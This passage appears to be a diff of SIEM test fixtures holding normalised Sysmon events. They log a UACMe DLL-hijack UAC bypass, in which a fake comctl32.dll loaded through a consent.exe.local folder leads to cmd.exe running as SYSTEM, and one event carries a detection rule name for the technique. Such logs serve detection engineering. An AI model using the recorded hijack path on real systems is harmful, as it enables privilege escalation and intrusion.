"object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.id": "2328", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:02:22.466Z", "uuid": "01da0c7e-03b2-01ee-8c68-005056825a53" } -{ "_checkpoint": 57615712010, "_meta": { "id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": [ "1864e292-4880-0001-0000-000000000007" ], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true }, "action": "start", "asset_ids": [ "1864e292-4880-0001-0000-000000000007" ], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:01:49.263\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.3232 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Consent UI for administrative applications\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"consent.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"consent.exe 368 272 00000285D6BE22C0\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{20fff121-f3f7-647d-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"1\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=C67713C28BB97E685FEB88FFAEB96788,SHA256=6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C,IMPHASH=1275A84E15AAA739F3099F6A73D7D6FA\",\"Name\":\"Hashes\"},{\"text\":\"{20fff121-f3f8-647d-1300-000000003900}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"368\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"Name\":\"ParentImage\"},{\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield1": "999", "datafield10": "consent.exe", "datafield19": "consent.exe (2328) ← svchost.exe (368) ← services.exe (648) ← wininit.exe (520) ← smss.exe (408) ← smss.exe (324)", "datafield2": "368", "datafield3": "c:\\windows\\system32\\", "datafield4": "svchost.exe", "datafield5": "consent.exe 368 272 00000285D6BE22C0", "datafield6": "20fff121-f3f7-647d-e703-000000000000", "datafield7": "999", "datafield8": "20fff121-f8dd-647d-8401-000000003900", "datafield9": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.id": "2328", "object.name": "consent.exe", "object.path": "c:\\windows\\system32\\", "object.process.chain": "consent.exe ← svchost.exe ← services.exe ← wininit.exe ← smss.exe ← smss.exe", "object.process.cmdline": "consent.exe 368 272 00000285D6BE22C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "20fff121-f8dd-647d-8401-000000003900", "object.process.hash": "IMPHASH:1275A84E15AAA739F3099F6A73D7D6FA MD5:C67713C28BB97E685FEB88FFAEB96788 SHA256:6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.hash.imphash": "1275A84E15AAA739F3099F6A73D7D6FA", "object.process.hash.md5": "C67713C28BB97E685FEB88FFAEB96788", "object.process.hash.sha256": "6272541FD22C1D9B5DFE9364A0A1D6B12BBCAA28EFA0504E3A344E967AEA9C5C", "object.process.id": "2328", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.original_name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "20fff121-f3f8-647d-1300-000000003900", "object.process.parent.id": "368", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.3232 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.3232 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:01:49.263Z", "uuid": "01da0c76-03b2-01ee-8c68-005056825a53" } +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:55.4089224Z\"},\"EventRecordID\":\"5455\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:55.376\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7957-5d45-0000-00100e620a01}\"},{\"Name\":\"ProcessId\",\"text\":\"3116\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BCAF0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BCAF0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7957-5d45-0000-00100e620a01", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "3116", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:55.376Z", "type": "raw", "uuid": "307840cf-68d8-4456-803b-09d028088acc"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5551743Z\"},\"EventRecordID\":\"5453\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.377\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"SourceProcessId\",\"text\":\"7564\"},{\"Name\":\"SourceThreadId\",\"text\":\"7188\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\consent.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"TargetProcessId\",\"text\":\"4192\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+a0fb4|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+47241|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+46196|C:\\\\Windows\\\\System32\\\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+48f07|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44865|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44648|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+44672|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+d62ca|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+c3879|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+756c3|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+7566e\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "7188", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|UNKNOWN(000001611150B621)|UNKNOWN(000001611150B621)|C:\\Windows\\SYSTEM32\\ntdll.dll+48f07|C:\\Windows\\SYSTEM32\\ntdll.dll+44865|C:\\Windows\\SYSTEM32\\ntdll.dll+44648|C:\\Windows\\SYSTEM32\\ntdll.dll+44672|C:\\Windows\\SYSTEM32\\ntdll.dll+d62ca|C:\\Windows\\SYSTEM32\\ntdll.dll+c3879|C:\\Windows\\SYSTEM32\\ntdll.dll+756c3|C:\\Windows\\SYSTEM32\\ntdll.dll+7566e", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.id": "4192", "object.process.name": "cmd.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.377Z", "type": "raw", "uuid": "6495c614-7815-48db-b001-15f7a3b97059"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5547781Z\"},\"EventRecordID\":\"5452\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.391\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7937-5d45-0000-00100d290801}\"},{\"Name\":\"ProcessId\",\"text\":\"4192\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7937-5d45-0000-00100d290801", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4192", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.391Z", "type": "raw", "uuid": "32c28c58-c00a-498a-9029-76636a5f0bb7"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:23.5243142Z\"},\"EventRecordID\":\"5451\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:23.363\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "subject.process.id": "7564", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:23.363Z", "type": "raw", "uuid": "4d0abd6d-a99b-4817-a3e0-6438c1b28920"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.9545970Z\"},\"EventRecordID\":\"5450\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:21.036\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7935-5d45-0000-001066ca0701}\"},{\"Name\":\"ProcessId\",\"text\":\"7324\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 